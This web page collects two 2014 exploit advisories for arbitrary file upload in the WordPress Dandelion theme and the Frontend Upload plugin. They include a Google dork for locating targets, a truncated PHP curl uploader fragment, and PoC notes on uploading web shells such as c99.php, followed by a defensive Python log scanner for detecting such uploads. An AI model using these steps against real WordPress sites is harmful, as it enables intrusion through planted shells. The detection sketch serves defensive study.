Wordpress Arbitrary File Upload

1. Wordpress Dandelion Themes Arbitrary File Upload

# Exploit Title: Wordpress Dandelion Themes Arbitrary File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
# Greetz: PhantomGhost, Deto Beiber, All Moroccan Hackers. We are Moroccans, we are genius!

[php]
"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[/php]

File Access: http://0day5.com/uploads/[years]/[month]/your_shell.php

2. Wordpress Frontend Upload Plugin - Arbitrary File Upload

# Exploit Title: Frontend Upload Wordpress Plugin - File Arbitrary Upload
# Date: 10/02/2014
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Frontend Upload
# http://codecanyon.net/item/frontend-upload/6076410?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=gtPlugins
# Tested on: Linux

[Comment]
Greetz: Ariel Orellana, TrustedBSD, Sunplace
www.remoteexecution.net
www.remoteexcution.com.ar

[PoC]
You can upload files with php extension. Example: c99.php, shell.gif.php, etc...
http://localhost/wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php
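Both advisories end with a script being requested from under /wp-content/uploads/. The following detection sketch is an added example, not code from either advisory: it scans a combined-format access log for such requests, including double extensions like shell.gif.php. The log lines, IP addresses, file names and the extension list are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions commonly mapped to the PHP handler (assumption; match your server config).
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Apache/nginx "combined" log format: ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def executable_upload(target):
    """Return the decoded path if it names a script under wp-content/uploads, else None."""
    path = unquote(urlsplit(target).path)  # drop the query string, decode %xx escapes
    if "/wp-content/uploads/" not in path.lower():
        return None
    filename = path.rsplit("/", 1)[-1].lower()
    # Check every dot-separated part, not only the last one (shell.gif.php, shell.php.gif).
    return path if any(p in EXEC_EXTS for p in filename.split(".")[1:]) else None

def scan(lines):
    """Return one finding per request for an executable file in the uploads tree."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        path = executable_upload(m["target"]) if m else None
        if path:
            findings.append({"ip": m["ip"], "path": path, "status": int(m["status"]),
                             "served": m["status"].startswith("2")})
    return findings

# Constructed sample log lines (documentation IP ranges, hypothetical file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Feb/2014:10:00:01 +0000] "GET /wp-content/uploads/2014/02/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Feb/2014:10:02:13 +0000] "GET /wp-content/uploads/feuGT_uploads/example.gif.php HTTP/1.1" 200 312 "-" "curl/7.30"',
    '203.0.113.9 - - [10/Feb/2014:10:02:40 +0000] "GET /wp-content/uploads/2014/02/example.ph%70?x=1 HTTP/1.1" 403 199 "-" "curl/7.30"',
    '198.51.100.7 - - [10/Feb/2014:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "served" set to true means the server returned the script's output and warrants immediate review of that file. Denying script execution inside the uploads directory at the web-server level removes the impact regardless of what a theme or plugin accepts.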
